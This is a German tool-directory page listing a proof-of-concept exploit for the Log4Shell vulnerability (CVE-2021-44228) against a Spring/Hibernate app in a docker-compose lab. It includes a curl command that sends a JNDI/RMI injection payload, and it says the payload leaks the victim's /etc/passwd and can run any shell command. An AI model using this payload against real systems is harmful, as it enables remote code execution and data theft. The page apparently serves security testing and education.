Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
cve-2021-44228--spring-hibernate — CVE-2021-44228 POC - Spring / Hibernate | Kitploit
Tools/GitHubGitHub/uint0/cve-2021-44228--spring-hibernate
Vulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingLearning & EducationPayload Development
GitHubuint0/cve-2021-44228--spring-hibernate

cve-2021-44228--spring-hibernate

CVE-2021-44228 POC - Spring / Hibernate

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen
Repository anzeigen
1vor 4 JahrenNoch nicht geprüft

CVE-2021-44228 POC - Spring / Hibernate

Dieser POC verwendet Spring / Hibernate, jedoch könnte ein ähnlicher Ansatz von rmi -> Deserialisierung verwendet werden, um jede Deserialisierungsschwachstelle auszulösen

TL;DR

root@kitploit:~
$ docker-compose up
$ curl -X POST -H 'Content-Type: text/plain' localhost:8080 --data-binary '${jndi:rmi://exploit:10000/a}'

Sie sollten den Inhalt der /etc/passwd des Opfers in den Logs des attacker-Containers sehen. Sie können den Befehl im exploit-Service ersetzen, um jeden Shell-Befehl auf dem Opfer auszuführen.

Opfer

Das Opfer führt eine standardmäßige Starter-Spring-App mit den Abhängigkeiten "Spring Data JPA" (für Hibernate), "Spring Web" und "H2" (als Datenspeicher) aus. Es wurden lediglich 2 Änderungen vorgenommen:

  1. Tests entfernt
  2. Den slf4j-Logger durch den anfälligen log4j-Logger ersetzt

Alle Abhängigkeiten sind auf dem neuesten Stand. Es sind keine magischen Flags aktiviert.

Das Opfer stellt einen per POST erreichbaren Endpunkt unter / bereit, der die Anfrage protokolliert.

Exploit

Der Exploit basiert auf einem Fork von ysoserial, der den Hibernate-Exploit-Generator verwendet. Damit der Exploit mit der neuesten Version von Hibernate funktioniert, müssen wir ysoserial neu kompilieren.

Tool herunterladen